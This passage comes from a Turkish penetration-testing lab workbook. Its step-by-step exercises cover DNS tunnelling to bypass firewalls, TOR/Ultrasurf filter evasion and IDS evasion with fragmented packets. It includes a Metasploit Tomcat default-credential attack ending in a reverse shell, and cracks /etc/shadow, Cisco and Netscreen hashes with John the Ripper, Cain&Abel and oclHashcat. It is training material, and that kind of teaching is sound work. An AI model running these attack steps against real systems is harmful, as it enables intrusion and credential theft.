BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
tcp-over-dns client, dns verisini encode ederek ISP'nin dns sunucusuna iletir. ISP'nin dns sunucuyu bu
isteğe yanıt veremez ve dns isteğini tcp-over-dns server a iletir. tcp-over-dns server gelen isteği decode
eder ve ilgili isteğe yanıtı client a geri gönderir. DNS isteklerinin, dns sunucu tarafından önbelleğe
alınma ihtimaline karşıherdnssorgusundarastgele birsubdomainkullanılır.
Ön Gereksinimler:
1. Dns isteklerinize yanıt alabildiğinizi doğrulamalısınız. Örneğin; 'nslookup google.com.tr' komutu
ile google ipadresleriniöğrenebiliyorsanız.DNSisteklerinize yanıtveriliyordur.
2. İnternet dünyasında sizin kontrolünüzde olan bir sunucu.Administrator veya root yetkilerine
sahip olmalısınız. UDP 53 portu farklı bir uygulama tarafından kullanılmıyor olmalı ve erişim
problemi yaşanmamalıdır.
3. Kullandığınız işletim sistemine göre tcp-over-dns yazılımı. Mutlaka java kurulu olmalıdır.
http://analogbit.com/software/tcp-over-dns
3.Adım:
Tcp-Over-DnsServerYapılandırması;
Bu işlem için bir alan adına ve bu alan adından sorumlu dns sunucuya ihtiyaç vardır. Bu örnekde
aşağıdaki dns kayıtlarıoluşturup,kullanılmıştır.
NS = dns.bga.com.tr
A = tunnel.bga.com.tr
tcpoverdns, multi platform çalışmaktadır (Windows,Linux,*BSD). Bu örnekde dns sunucu FreeBSD
istemci ise Windows7 işletimsistemindekurulmuştur.
Not: Tcp-Over-Dnsserver,gelentrafiğiport443 (sshservisine) yönlendirecektir.
4.Adım:
Tcp-Over-DnsClientYapılandırması;
İstemci bilgisayarda client-example.bat dosyası düzenlenerek DOMAIN değeri bu iş için oluşturulan alan
adı ile değiştirilir.
260.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
client-example.batdosyasıçalıştırıldığındatünel için127.0.0.1:8080 portu dinlemealınacaktır.
Tcp-Over-Dns Client, yerel bilgisayarda 8080 portunu dinleme açtı ve bu porta yapılan bağlantıları
tunnel.bga.com.trmakinasının443 (ssh) portunailetecektir.
5.Adım:
Test için, putty aracı ile 127.0.0.1:8080 portuna bağlantı isteği başlatıldığında bga.com.tr adresinin 443
portunaerişimkurulacaktır.
261.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
SSH trafiği Firewall tarafındanengellenmişolsada,DNSpaketleriile sshtrafiği internete kaçırıldı.
Bu yöntemile birçokyerde bulunanHotspotsistemleri de atlatılabilmekmümkündür.
Ek Kaynaklar:
---
UygulamaNo:BGA-PT-78
Uygulama Adı: Ultrasurf ve TOR Kullanarak İçerik Filtreleme Sistemlerini Atlatma
Amaç: Ultrasurf ve TOR yazılımlarınınkullanımıve içerikfiltrelemesistemlerini atlatma
KullanılanAraçlar:
TOR
Ultrasurf
Adımlar:
1.Adım: Kullandığımız firewall’un 2000 ve 8800 portlarını engellemesine ragmen biz ultrasurf kullanarak
hedeflerinilgili portlarınaerişimyapabilecegiz.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
2.Adım: Tor networklerine dahil olarak hedefe rastgele IP adresleri üzerinden giderek içerik filtreleme
cihazlarıkolaylıklaatlatılabilir.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Ek Kaynaklar:
----
UygulamaNo:BGA-PT-79
Uygulama Adı: Tersine Kanal Açma Yöntemleri
Amaç:
KullanılanAraçlar:
Adımlar:
1.Adım: Tomcat uygulaması kurulu hedef sistem üzerindeki açık portlar taranmıştır ve yalnız 8080
portununaçık olduğugörülmüştür.
root@bt:~/beef-master#nmap -n -v -T56.6.6.120 -sV
Starting Nmap 6.01 ( http://nmap.org ) at2013-01-10 15:29 EET
NSE: Loaded 17 scripts forscanning.
Initiating ARPPing Scan at 15:29
267.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Scanning 6.6.6.120 [1 port]
Completed ARPPing Scan at 15:29, 0.06s elapsed (1 total hosts)
Initiating SYN StealthScan at 15:29
Scanning 6.6.6.120 [1000 ports]
Discovered open port8080/tcp on 6.6.6.120
Completed SYN StealthScan at 15:30, 11.87s elapsed (1000 total ports)
Initiating Service scan at 15:30
Scanning 1 service on 6.6.6.120
Completed Service scan at 15:30, 6.21s elapsed (1 service on 1 host)
NSE: Scriptscanning 6.6.6.120.
Nmap scan reportfor6.6.6.120
Host is up (0.19s latency).
Notshown:999 filtered ports
PORT STATE SERVICEVERSION
8080/tcp open http ApacheTomcat/CoyoteJSPengine1.1
MACAddress:20:C9:D0:BF:7D:F1 (Unknown)
Read datafiles from:/usr/local/bin/../share/nmap
Service detection performed.Pleasereportany incorrect resultsat http://nmap.org/submit/.
Nmap done:1 IP address(1hostup) scanned in 18.62 seconds
Raw packetssent:2008 (88.336KB) | Rcvd:10 (424B)
2.Adım:
Tomcat’e ait ön tanımlı parolayı bulmak için metasploit aux modüllerinden tomcat_mgr_login
kullanılmıştır;
msf > useauxiliary/scanner/http/tomcat_mgr_login
msf auxiliary(tomcat_mgr_login) >set RHOSTS6.6.6.120
RHOSTS=> 6.6.6.120
msf auxiliary(tomcat_mgr_login) >exploit
[*] 6.6.6.120:8080 TOMCAT_MGR- [14/56] - Trying username:'role1'with password:'role1'
[-] 6.6.6.120:8080 TOMCAT_MGR - [14/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application
Manager] failed to login as'role1'
[*] 6.6.6.120:8080 TOMCAT_MGR- [15/56] - Trying username:'root'with password:'root'
[-] 6.6.6.120:8080 TOMCAT_MGR - [15/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application
Manager] failed to login as'root'
[*] 6.6.6.120:8080 TOMCAT_MGR- [16/56] - Trying username:'tomcat'with password:'tomcat'
[+] http://6.6.6.120:8080/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] successful
login'tomcat' : 'tomcat'
3.Adım:
268.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Yalnız 8080 portuna dışarıdan erişim olan ve bu portta tomcat uygulaması olduğunu bildiğimiz hedef
sunucuda shell almaya çalışalım. Shell için hedef sistemin 8080 portuna bağlanarak almak istediğimizde
bu port başka bir uygulama tarafından kullanıldığı için başarısız olmamız beklenmektedir. 8080 dışındaki
portlaradaerişimolmadığıiçinbağlantıbaşarısız olacaktır.
root@bt:~/beef-master#/opt/metasploit/msf3/msfconsole
=[ metasploitv4.6.0-dev [core:4.6 api:1.0]
+ -- --=[ 1023 exploits - 567 auxiliary - 168 post
+ -- --=[ 262 payloads - 28 encoders - 8 nops
=[ svn r16295 updated today (2013.01.09)
msf >
msf auxiliary(tomcat_mgr_login) >useexploit/multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) >show options
Moduleoptions(exploit/multi/http/tomcat_mgr_deploy):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no The password forthespecified username
PATH /manager yes The URI path of themanagerapp (/deploy and /undeploy willbe used)
Proxies no Use a proxy chain
RHOST yes The targetaddress
RPORT 80 yes The targetport
USERNAME no The usernameto authenticateas
VHOST no HTTP servervirtual host
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(tomcat_mgr_deploy) >setRHOST 6.6.6.120
RHOST => 6.6.6.120
msf exploit(tomcat_mgr_deploy) >setUSERNAMEtomcat
USERNAME=> tomcat
msf exploit(tomcat_mgr_deploy) >setPASSWORDtomcat
msf exploit(tomcat_mgr_deploy) >setPAYLOADjava/shell/bind_tcp
PAYLOAD=> java/shell/bind_tcp
269.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
msf exploit(tomcat_mgr_deploy) >setRPORT 8080
RPORT => 8080
msf exploit(tomcat_mgr_deploy) >exploit
[*] Attempting to automatically selecta target...
[*] Started bind handler
[*] Automatically selected target"WindowsUniversal"
[*] Uploading 6453 bytesas zrcpCowxXcid7RyPn9IpgouLuV8f.war...
[*] Executing /zrcpCowxXcid7RyPn9IpgouLuV8f/dzDeKbiDP9pjTl.jsp...
[*] Undeploying zrcpCowxXcid7RyPn9IpgouLuV8f ...
msf exploit(tomcat_mgr_deploy) >
4.Adım:
Görüldüğü gibi hedef sistemde bind method ile shell alamadık. Şimdi ise tersine kanal açarak yani
sunucunun bize bağlantı kurması yönetmiyle shell almaya çalışalım. Bunun için reverse_tcp_bind
method kullanılacaktır. İlgili payload ve geri bağlantı kuracağı local IP adresimizi aşağıdaki gibi
metasploiteveriyoruz.
msf exploit(tomcat_mgr_deploy) >setPAYLOADjava/shell/reverse_tcp
PAYLOAD=> java/shell/reverse_tcp
msf exploit(tomcat_mgr_deploy) >setLHOST 6.6.6.121
LHOST => 6.6.6.121
msf exploit(tomcat_mgr_deploy) >exploit
[*] Started reversehandleron 6.6.6.121:4444
[*] Attempting to automatically selecta target...
[*] Automatically selected target"WindowsUniversal"
[*] Uploading 6467 bytesas qNu9eOUeHY9QFfmw3Wl3eLJHqNTO.war...
[*] Executing /qNu9eOUeHY9QFfmw3Wl3eLJHqNTO/WUo6CdpVz.jsp...
[*] Undeploying qNu9eOUeHY9QFfmw3Wl3eLJHqNTO...
[*] Sending stage(2976 bytes) to 6.6.6.120
[*] Command shellsession 1 opened (6.6.6.121:4444 -> 6.6.6.120:1252) at 2013-01-10 15:42:14 +0200
MicrosoftWindowsXP[Sürüm5.1.2600]
(C) Telif Hakkı1985-2001 MicrosoftCorp.
C:ProgramFilesApacheSoftwareFoundationTomcat6.0>ipconfig
ipconfig
WindowsIPYapılandırmas
270.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
EthernetbağdaştırıcıYerel Ağ Bağlantısı:
Bağlantıya özgü DNSSoneki. . . :
IPAdres.. . . . . . . . . . . . : 6.6.6.120
Alt Ağ Maskesi.. . . . . . . . . : 255.255.255.0
Varsayılan Ağ Geçidi.. . . . . . : 6.6.6.254
C:ProgramFilesApacheSoftwareFoundationTomcat6.0>
Görüldüğü gibi tersine kanal açma yöntemi ile hedef sistem önündeki firewall atlatılıp hedef sistem
üzerinde shell alabildik.
Port tarama yapılacak..1port açık olduğunuve diğerlerininkapalıolduğunugörmek
Metasploitçalıştırıpbindtcp shell yapıpçalışmadığını görmek..
Reverse_shellyapıpshell alıpkomutçalıştırma…
Ek Kaynaklar:
---
UygulamaNo:BGA-PT-80
Uygulama Adı: Parçalanmış Paketlerle Güvenlik Duvarı Atlatma
Amaç: Http trafiğini inceleyen ve /etc/passwd dosyasını yakalamaya karşı bir imza barındıran IPS
sistemini atlatma.
KullanılanAraçlar:
Fragroute
nrep
Adımlar:
1.Adım: Parçalanmış paketler konusunda en sıkıntılı sistemler IDS/IPS’lerdir. Bunun nedeni bu
sistemlerin temel işinin ağ trafiği inceleme olmasıdır. Saldırı tespit sistemleri gelen bir paketin/paket
grubunun saldırı içerikli olup olmadığını anlamak için çeşitli kontrollerden geçirir. Eğer bu kontrolleri
geçirmeden önce paketleri birleştirmezse çok rahatlıkla kandırılabilir. Mesela HTTP trafiği içerisinde
“/etc/passwd” stringi arayan bir saldırı imzası olsun. IDS sistemi 80.porta gelen giden her trafiği
inceleyerek içerisinde /etc/passwd geçen paketleri arar ve bu tanıma uyan paketleri bloklar. Eğer IDS
sistemimiz paket birleştirme işlemini uygun bir şekilde yapamıyorsa biz fragroute veya benzeri bir araç
kullanarak /etc/passwd stringini birden fazla paket olacak şekilde (1. Paket /etc, 2.paket
/passwd)gönderipIDSsistemini atlatabiliriz.
2.Adım: Ngreparacını IPSgibi kullanıp/etc/passwddosyasınıhedeftenGETtalebi ile isteyelim,
271.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Görüldüğügibi nmapilgili içeriği barındıranGET talebini yakaladı.
3.Adım: Şimdi talebimizi fragroute aracılığı ile parçalayara gönderirsek ngrep’in birşey yakalayamadığını
görebiliriz.AynışekildeIPS/IDSsistemleridekolaylıklaatlatılabilir.
Ek Kaynaklar:
Şifre Parola Kırma SaldırılarıLab Uygulamaları
272.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
UygulamaNo:BGA-PT-81
Uygulama Adı: MD5, SHA1, SHA512 Hasli Parolaları Kırmak
Amaç:Hashli parolalarınkırılması
KullanılanAraçlar:
JTR(JohnThe Ripper)
Adımlar:
1.Adım: MD5 hash algoritmasınıkullananbirkullanıcı;
2.Adım:JTR(JohnThe Ripper) ile MD5hashli parolalarıkırma;
root@bt:/pentest/passwords/john#./john --format=raw-MD5md5hash.txt
Loaded 1 password hash (RawMD5[128/128 SSE2 intrinsics 4x])
123456 (admin)
guesses:1 time: 0:00:00:00 DONE(Mon Dec 3 21:56:41 2012) c/s: 21050 trying:123456 - password1
Usethe "--show"option to display all of the cracked passwordsreliably
3.Adım: JTR ile SHA1(sha256crypt) parolakırmak için;
root@bt:/pentest/passwords/john# ./john --format= sha256crypt sha1hash.txt –w:password.lst --
rules
4.Adım: JTR ile SHA1(sha512crypt) parolakırmak için;
root@bt:/pentest/passwords/john# ./john --format= sha512crypt aha512hash.txt –w:password.lst --
rules
Ek Kaynaklar:
---
Uygulama No:BGA-PT-82
Uygulama Adı: John The Ripper Kullanarak Linux Parolalarını Kırma
Amaç: Ele geçirilenlinux sistemlere aitparolahashlerininbulunduğu/etc/shadow içeriğini kırmak
KullanılanAraçlar:
JTR
Adımlar:
273.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
1.Adım: Linux sistemlerde /etc/shadow dosyası kullanıcıların username ve parolalarının hash’li olarak
tutulduklarıdosyadır.
root@bt:~# cat /etc/shadow
root:$6$J6ZgEmYn$2NNS1gNTZB0j8Pq3hDPHgjeNmVcEdh8lsGtZJ6fTQdoECe.x5pmHCzKrE2QAM8VVmD
2tVvoavs404ncokrRt9/:15677:0:99999:7:::
celal:$6$64yvqgLk$Kjprry8yF/p5Izxx/BtQoIlhzqv.QMQRiNSNal/RTmlRY3PJkhs7IAMwqfI7tuCynKL6.IJed12
kX9jXZfxlJ1:15677:0:99999:7:::
daemon:x:15645:0:99999:7:::
bin:x:15645:0:99999:7:::
sys:x:15645:0:99999:7:::
www-data:x:15645:0:99999:7:::
backup:x:15645:0:99999:7:::
list:x:15645:0:99999:7:::
irc:x:15645:0:99999:7:::
gnats:x:15645:0:99999:7:::
libuuid:x:15645:0:99999:7:::
syslog:x:15645:0:99999:7:::
sshd:x:15645:0:99999:7:::
pulse:*:15645:0:99999:7:::
rtkit:*:15645:0:99999:7:::
festival:*:15645:0:99999:7:::
postgres:!:15645:0:99999:7:::
2.Adım: /etc/shadowdosyasındakikullanıcıparolalarınınkırılması;
root@bt:~# cd /pentest/passwords/john/
root@bt:/pentest/passwords/john#./john/etc/shadow
Warning:detected hash type"sha512crypt",but thestring is also recognized as"crypt"
Usethe "--format=crypt"option to forceloading theseasthattypeinstead
Loaded 2 password hasheswith2 differentsalts(sha512crypt[32/32])
toor (root)
passw0rd (celal)
guesses:2 time: 0:00:00:40 DONE(Mon Dec 3 21:39:31 2012) c/s: 125 trying:passw0rd
Usethe "--show"option to display all of the cracked passwordsreliably
Ek Kaynaklar:
---
Uygulama No:BGA-PT-83
Uygulama Adı: John The Ripper Kullanarak Cisco/JuniperParolalarını Kırma
274.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Amaç: Juniperve ciscocihazlaraaitparolalarınkırılması.
KullanılanAraçlar:
JTR
JuniperFw
Adımlar:
1.Adım : John The Ripper ile netscreen cihazlarının kullandığı hash algoritmasını(NS MD5) kullanıp bir
kullanıcıadı ve parolahash’i oluşturulacaktır;
root@bt:~# cd /pentest/passwords/john/
root@bt:/pentest/passwords/john#pythonnetscreen.pyadmin123456
admin:admin$nOHUFKrhP1gFczKIYsyM8FFtwjG5yn
Not:Bir Netscreen cihaz üzerinden alınacak hash bizim oluşturduğumuz ile aynı olacaktır. Aşağıda örnek
bir Netscreen cihazı üzerinden alınan hash yapısı görülebilir(hash’in başı ve sonu ‘n’ karakteri ile başlayıp
bitmektedir);
2. Adım:Elde ettiğmiznetscreenhash’i birtextdosyasınakopyalanmıştır;
root@bt:/pentest/passwords/john# echo 'admin:admin$nOHUFKrhP1gFczKIYsyM8FFtwjG5yn' >
hash.txt
root@bt:/pentest/passwords/john#morehash.txt
admin:admin$nOHUFKrhP1gFczKIYsyM8FFtwjG5yn
3. Adım: Netscreen ile aynı hash algoritması kullanılarak oluşturulan hash değeri john the ripper ile
kırılacaktır;
root@bt:/pentest/passwords/john#./johnhash.txt -w:password.lst
Loaded 1 password hash (Netscreen MD5[32/32])
123456 (admin)
guesses:1 time: 0:00:00:00 DONE(Sun Dec 2 21:19:36 2012) c/s: 10.00 trying:123456
Usethe "--show"option to display all of the cracked passwordsreliably
root@bt:/pentest/passwords/john#
4. Adım: Cisco hash yapısındaki aşağıdaki kullanıcı adı ve hash bilgisi cisco.txt metin dosyasına
yazılmıştır;
275.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
root@bt:/pentest/passwords/john#echo'cisco:2KFQnbNIdI.2KYOU'>cisco.txt
root@bt:/pentest/passwords/john#morecisco.txt
cisco:2KFQnbNIdI.2KYOU
5. Adım:Cisco bircihaza aitolanhash bilgisi JTR(JohnThe Ripper) ile kırılmıştır;
root@bt:/pentest/passwords/john#./johncisco.txt -w:password.lst
Loaded 1 password hash (PIXMD5[128/128 SSE2 intrinsics 32x4x1])
cisco (cisco)
guesses:1 time: 0:00:00:00 DONE(Sun Dec 2 21:40:21 2012) c/s: 354700 trying:!@#$% - cisco
Usethe "--show"option to display all of the cracked passwordsreliably
Ek Kaynaklar:
---
Uygulama No:BGA-PT-84
Uygulama Adı: Cain&Abel Kullanarak Parola Kırma Saldırıları
Amaç: Cain&Abel aracıile parolakırmak
KullanılanAraçlar:
Cain&Abel
Adımlar:
WindowsNTLMparolasısözlüksaldırısı (DictionaryAttack) ile kırılacaktır.
1. Adım:Cain & Abel aracı çalıştırılarak Cracker menüsüseçilir.
276.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
2.Adım: Artı (+) işaretine basılarak local sistemdekihashbilgileriniimportetmekistediğimizi belirtiyoruz.
3.Adım: Kırmak istediğimiz kullanıcı satırının üstüne gelip sağ tıklıyoruz ve buradan istenilen saldırı tipi ve
hash türüseçilir.Bizdictionaryattackve ntlmseçiyoruz.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
4.Adım: Karşımıza gelen ekranda saldırı yapacağımız sözlük listemizi vermek için sağ tıklayıp add to list
seçeneğiniseçiyoruz.
5.Adım: İlgili sözlüklistesi seçilipstartdenilir.
279.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
6.Adım: Parolamızbaşarı ile bulunmuştur.Testkullanıcısınaaitparola123456 olaraktesbitedilmiştir.
280.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Ek Kaynaklar:
---
Uygulama No:BGA-PT-85
Uygulama Adı: OclHashcat Kullanarak Parola Kırma Saldırıları
Amaç: CPU tabanlıparolakırma aracı olanoclHashcat+ ile parolakırma.
KullanılanAraçlar:
OclHashcat
Adımlar:
1.Adım: OclHashcatkullanarakmd5crypt(oclhashcatid=500)parolakırma;
root@bt:/pentest/passwords/oclhashcat+#./oclHashcat-plus64.bin -m500 hashes.txtwordlist.txt
281.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
2.Adım: OclHashcat kullanarak MD5 parolayı(-m 0) combination saldırı tipi (-a 1) ile belirtilen rule
kullanarak(-r) kırmave sonuçlarıkaydetme(-o).
root@bt:/pentest/passwords/oclhashcat+# ./oclHashcat-plus64.bin -m 0 –a 1 hashes.txt wordlist.txt -
r rules/best64.rule -o sonuclar–remove
3.Adım: OclHashcat kullanarak MD5 parolayı bruteforce saldırı methodu ve özel oluşturulan karakter
ailesi ile(küçükharf,büyükharf,rakamvs.) ile kırma
root@bt:/pentest/passwords/oclhashcat+# ./oclHashcat-plus64.bin -m 0 –a 3 -1 ?l?d?u?s hashes.txt
wordlist.txt-r rules/best64.rule-o sonuclar–remove
Simgelerindetayları;
?l = abcdefghijklmnopqrstuvwxyz
?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
?d = 0123456789 ?a = ?l?u?d?s
?s = !"#$%&'()*+,-./:;<=>?@[]^_`{|}~
?h = 8 bit charactersfrom0xc0 - 0xff
?D = 8 bit charactersfromgerman alphabet
?F = 8 bit charactersfromfrench alphabet
?R = 8 bit charactersfromrussian alphabet
Saldırı tipleri;
0 = Straight
1 = Combination
3 = Brute-force
6 = Hybriddict + mask
7 = Hybridmask + dict
Hash tipleri;
0 = MD5
10 = md5($pass.$salt)
20 = md5($salt.$pass)
30 = md5(unicode($pass).$salt)
40 = md5($salt.unicode($pass))
100 = SHA1
110 = sha1($pass.$salt)
120 = sha1($salt.$pass)
130 = sha1(unicode($pass).$salt)
140 = sha1($salt.unicode($pass))
300 = MySQL
400 = phpass,MD5(Wordpress),MD5(phpBB3)
500 = md5crypt, MD5(Unix),FreeBSDMD5, Cisco-IOSMD5
900 = MD4
1000 = NTLM
1100 = DomainCachedCredentials,mscash
282.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
1400 = SHA256
1410 = sha256($pass.$salt)
1420 = sha256($salt.$pass)
1500 = descrypt,DES(Unix),TraditionalDES
1600 = md5apr1, MD5(APR),Apache MD5
1700 = SHA512
1710 = sha512($pass.$salt)
1720 = sha512($salt.$pass)
1800 = sha512crypt, SHA512(Unix)
2100 = DomainCachedCredentials2,mscash2
2400 = Cisco-PIXMD5
2500 = WPA/WPA2
2600 = Double MD5
3000 = LM
3100 = Oracle 7-10g, DES(Oracle)
3200 = bcrypt, Blowfish(OpenBSD)
Ek Kaynaklar:
---
Uygulama No:BGA-PT-86
Uygulama Adı: Crunch Kullanarak İsteğe Göre Sözlük Listesi Oluşturma
Amaç: Crunchile istenilenformattawordlistoluşturma
KullanılanAraçlar:
Crunch
Adımlar:
1.Adım: Backtrack linux işletimsistemi üzerinde kurulugelencrunch'ailgili pathtakipedilerekerişilebilir;
root@bt:~/Desktop# cd /pentest/passwords/crunch/
root@bt:/pentest/passwords/crunch#ls
charset.lst crunch GPL.TXT
Burada charset.lst isimli dosya crunch ile birlikte kullanabileceğiniz karakter gruplarının tanımlandığı
dosyadır.Örneğin yalnızca rakamların kullanılacaksa bu dosyada bu gruba verilen numerics charseti
kullanılmalıdır.Charset.lst dosyasınıniçeriğininbirkısmıaşağıdaki gibidir.
root@bt:/pentest/passwords/crunch#catcharset.lst
# charsetconfiguration fileforwinrtgen v1.2 by Massimiliano Montoro (mao@oxid.it)
283.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
# compatiblewithrainbowcrack1.1 and later by Zhu Shuanglei<shuanglei@hotmail.com>
hex-lower = [0123456789abcdef]
hex-upper = [0123456789ABCDEF]
numeric = [0123456789]
numeric-space = [0123456789 ]
symbols14 = [!@#$%^&*()-_+=]
symbols14-space = [!@#$%^&*()-_+= ]
symbols-all = [!@#$%^&*()-_+=~`[]{}|:;"'<>,.?/]
symbols-all-space = [!@#$%^&*()-_+=~`[]{}|:;"'<>,.?/]
ualpha = [ABCDEFGHIJKLMNOPQRSTUVWXYZ]
ualpha-space = [ABCDEFGHIJKLMNOPQRSTUVWXYZ]
ualpha-numeric = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789]
ualpha-numeric-space = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 ]
2.Adım: Yalnızca rakamlardan oluşan minimum 1, maksimum 8 karakterli rakamlar.txt isimli wordlist
oluşturma;
root@bt:/pentest/passwords/crunch#./crunch18 -fcharset.lst numeric-o rakamlar.txt
Crunch will nowgeneratethefollowing amountof data:987654320 bytes
941 MB
0 GB
0 TB
0 PB
Crunch will nowgeneratethefollowing numberof lines: 111111110
25%
53%
76%
100%
Burada -f parametresi charset değerini vermek için, -o parametresi ise output(çıktı) dosyasını belirtmek
içinkullanılmıştır.
Aynı işlemşukomutladayapılabilir;
root@bt:/pentest/passwords/crunch#./crunch18 1234567890 numeric-o rakamlar.txt
284.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
3.Adım: Aşağıda verilenseneryoyagöre wordlistoluşturulacaktır;
1.Şifreninilk4karakteri 1453
2.Şifre 10 karakterli
3.Şifreninsoniki karakteri ab
4.Geri kalankısımları ise büyükharflerdenoluşmaktadır.(ohalde ","(virgül) işareti kullanılacaktır)
5.Çıktı ozel.txtdosyasınayazdırılacaktır.
root@bt:/pentest/passwords/crunch#./crunch10 10 -t 1453,,,,ab -o ozel.txt
Crunch will nowgeneratethefollowing amountof data:5026736 bytes
4 MB
0 GB
0 TB
0 PB
Crunch will nowgeneratethefollowing numberof lines: 456976
100%
Oluşturulanparolalarınbirkısmıaşağıda gösterilmiştir.
root@bt:/pentest/passwords/crunch#headozel.txt
1453AAAAab
1453AAABab
1453AAACab
1453AAADab
1453AAAEab
1453AAAFab
1453AAAGab
1453AAAHab
1453AAAIab
1453AAAJab
Özel birwordlistoluşturmakiçinkullanılan -tparametresi ilekullanılabiecekkarakterlerve anlamları;
@ işareti küçükharfli karakterleriyazdırmakiçin
, işareti büyükharflikarakterleriyazdırmakiçin
% rakam kullanmakiçin
^ özel karakterleryazdırmakiçin kullanılır.
Ek Kaynaklar:
285.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
---
Uygulama No:BGA-PT-87
Uygulama Adı: Internetten Sözlük Listeleri İndirme
Amaç: İnternettenwordlisteldeetmek
KullanılanAraçlar:
Çeşitli websiteleri
Adımlar:
1.Adım: İnternette wordlistbulunabilecekilgili websiteleriniziyaretedebilirsiniz.
● http://packetstormsecurity.org/Crackers/wordlists/
● http://www.outpost9.com/files/WordLists.html
286.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Ek Kaynaklar:
---
Uygulama No:BGA-PT-88
Uygulama Adı: Internetten Hash Arama
Amaç: Elde ettiğimiz hash değerlerini online ortamlarda tutulan hash veritabanlarında sorgulayarak hızlı
bir şekildekırmak.
KullanılanAraçlar:
Çeşitli webuygulamaları
Adımlar:
1. Adım;Google önbelleğindenhasharamak.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
[+] sha1(md5($pass).$salt)
[+] sha1(md5(sha1($pass)))
[+] sha1(sha1($pass))
[+] sha1(sha1($pass).$salt)
[+] sha1(sha1($pass).substr($pass,0,3))
[+] sha1(sha1($salt.$pass))
[+] sha1(sha1(sha1($pass)))
[+] sha1(strtolower($username).$pass)
-------------------------------------------------------------------------
HASH:
İlgili script parametre verilmeden çalıştırılır,bizden HASH ifadesine bir tipini bulmak istediğimiz hash
bilgisinigirmemiziister.Böylece yüksekve düşükihtimal ile hash/encode tipinibize bildirir.
Not:Hashtipininkesinolarakbilinmesi herzamanmümkündegildir.
Ek Kaynaklar:
---
Uygulama No:BGA-PT-90
Uygulama Adı: Hydra Kullanarak Online Brute Force Atakları
Amaç: Hydra aracı ile onlineolarakparolakırmasaldırısı
KullanılanAraçlar:
Hydra
Adımlar:
1. Adım: Hedef sistemlere kaba kuvvet saldırısı yaparken kullanacağımız kullanıcı adlarını users.txt,
